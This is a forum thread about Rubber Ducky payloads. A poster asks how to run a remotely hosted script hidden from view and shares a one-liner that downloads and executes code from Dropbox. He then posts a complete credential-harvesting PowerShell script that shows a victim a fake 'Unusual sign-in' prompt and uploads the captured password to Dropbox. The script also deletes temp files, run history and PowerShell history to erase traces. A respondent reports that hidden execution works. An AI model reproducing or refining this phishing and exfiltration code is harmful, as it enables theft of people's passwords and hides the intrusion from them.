Jbv Posted November 5 Posted November 5 I've got a powershell command here that does everything I want it to, but it only works for .ps1 files. "powershell -w h -c "iex ([Text.Encoding]::UTF8.GetString((iwr 'https://DROPBOX-LINK' -UseBasicParsing).Content))" Been trying to find a command that is as concise as this that works for .vbs file, but cannot seem to find anything. Any help on how to create a command that has the same functionality as the .ps1 version, but for .vbs would be greatly appreciated! Quote
dark_pyrro Posted November 6 Posted November 6 Just a bit confused about the use case here. What is the reason to why PowerShell can't be used on the target? Blocked? (Sounds a bit odd that PowerShell isn't allowed, but VBS is) As I understand it you are trying to obtain the byte code of a string from a source on Dropbox, and this is what's puzzles me. Why cross the stream for water? Why obtain a byte/hex based source from the internet, convert it to text, and then run the command that the text represents when the Ducky is already available on the target and able to type strings? Why download it as hex/byte and then convert it to text? In need of some sort of obfuscation? There must be reasons to this, but as long at it's "black box", it's a bit difficult to suggest a valid alternative. A thing that adds to the confusion is the title of the thread; "Execute a powershell command through 'RUN' which runs a .vbs file located in a dropbox". Why avoid using PowerShell (and use VBS) if it still is PowerShell that initiates it all? That means PowerShell isn't blocked. Might be monitored though, but in that case vbs could be as well, otherwise somethings wrong in the cybersec design/architecture of the environment at hand. Quote
Jbv Posted November 7 Author Posted November 7 Thank you for your response, I got a PowerShell script on Dropbox that I require to be run on hidden, without displaying any windows. I cannot run the entire PowerShell script through Ducky as it is quite long, due to that reason it would take a lot of time to input the entire script. I’ve found that receiving the script outside of the Ducky would prove more efficient. Initially, I attempted to run the PowerShell script on my dropbox through a PowerShell command which I couldn’t get working without some kind of window popping up. As a workaround, I decided to experiment running the script with VBS which ended up working perfectly. Now, I’m trying to get a command to run a VBS script on my dropbox, which then runs a PowerShell script on my dropbox (great workaround I know.) I need the command to be relatively short and in one-line so I can execute it directly from ‘run’ which is the fastest method. Hope that gives you a better idea of where I am at. Quote
dark_pyrro Posted November 7 Posted November 7 I don't fully get the "run a VBS script on my dropbox" or "runs a PowerShell script on my dropbox". You can't execute things *on* Dropbox. You can of course obtain (download) things from Dropbox, but they have to be executed on the target device, not on Dropbox. Looking at you previously posted "one-liner", I see that you execute PowerShell with "-w h" that is supposed to hide the PS window. But I guess that it's not enough for you since PowerShell pops up anyway for a short while and isn't actually fully hidden/stealth. Is that correct, or is the PowerShell window visible to you in any form during execution (i.e. for a longer while than just flashing up and then goes away)? However, you will most likely have issues to get it to execute totally silent. I mean, it won't be silent anyway since the Windows run dialog will show no matter what you try. The payload needs to trigger/kick off in some way, not sure how you would be able to pull that off without having something that ignites it all. You could try various lolbins and see if they can download and execute things all stealth, but I don't think so, most will pop up something that will be visible. Quote
Jbv Posted November 7 Author Posted November 7 Yes I meant downloaded from dropbox, and run on the target device. The issue I encounter when I run it with PowerShell using “-w h” is that PowerShell minimises after the command is run, but never closes. (You can simply click on it to bring it back up.) This is not about the .ps1 script but rather the command that initiates it from what I can understand, as this does not happen when it’s run with VBS. To put it in simpler words, running the .ps1 file directly with PowerShell causes the following: Run window flashes, a powershell window appears and minimises, but never closes until the .ps1 script is complete. None of those happen when the script is run with the VBS file. I’m not quite sure why the PowerShell command causes the .ps1 file to execute with a visible window. I could attach the code behind my .ps1 file I’m trying to execute if you’d like? It could help you get a better understanding on why that might be happening. Quote
dark_pyrro Posted November 7 Posted November 7 That behavior sounds a bit odd. It should hide. You can of course post the PowerShell code. Quote
Jbv Posted November 10 Author Posted November 10 The script below generates a "Unusual login" prompt asking the victim for their password. (This is a slightly modified version of Jackoby's Rubber Ducky "Credz-Plz" script.) $DropBoxAccessToken = "" $FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" <# .NOTES This generates the ui.prompt to harvest the credentials #> function Get-Creds { do{ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) { [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!") Get-Creds } $creds = $cred.GetNetworkCredential() | fl return $creds # ... $done = $true } until ($done) } <# .NOTES This pauses the script until mouse movement is detected #> function Pause-Script{ Add-Type -AssemblyName System.Windows.Forms $originalPOS = [System.Windows.Forms.Cursor]::Position.X $o=New-Object -ComObject WScript.Shell while (1) { $pauseTime = 3 if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ break } else { $o.SendKeys("{CAPSLOC}");Start-Sleep -Seconds $pauseTime } } } # This script repeadedly presses the capslock button (OUTDATED, IGNORE!) # This function makes sure that capslock is turned off before ui.prompt appears function Caps-Off { Add-Type -AssemblyName System.Windows.Forms $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') #If true, toggle CapsLock key, to ensure that the script doesn't fail if ($caps -eq $true){ $key = New-Object -ComObject WScript.Shell $key.SendKeys('{CapsLock}') } } <# .NOTES This freezes the function until mouse movement is detected, in which after it activates the pop-up #> Pause-Script Caps-Off Add-Type -AssemblyName System.Windows.Forms [System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account") $creds = Get-Creds <# .NOTES This saves the gathered credentials to a file in the temp directory #> echo $creds >> $env:TMP\$FileName <# .NOTES This uploads the gathered credentials file to the dropbox #> $TargetFilePath="/$FileName" $SourceFilePath="$env:TMP\$FileName" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers <# .NOTES This removes most traces of you, and evidence to prove you were there #> # Deletes contents of Temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # Deletes run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Deletes powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Deletes contents of recycle bin Clear-RecycleBin -Force -ErrorAction SilentlyContinue Quote
dark_pyrro Posted November 11 Posted November 11 Can't see why that script shouldn't be possible to run with a hidden window. I just made a quick test (downloading the script from a server and then execute it) and it works. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.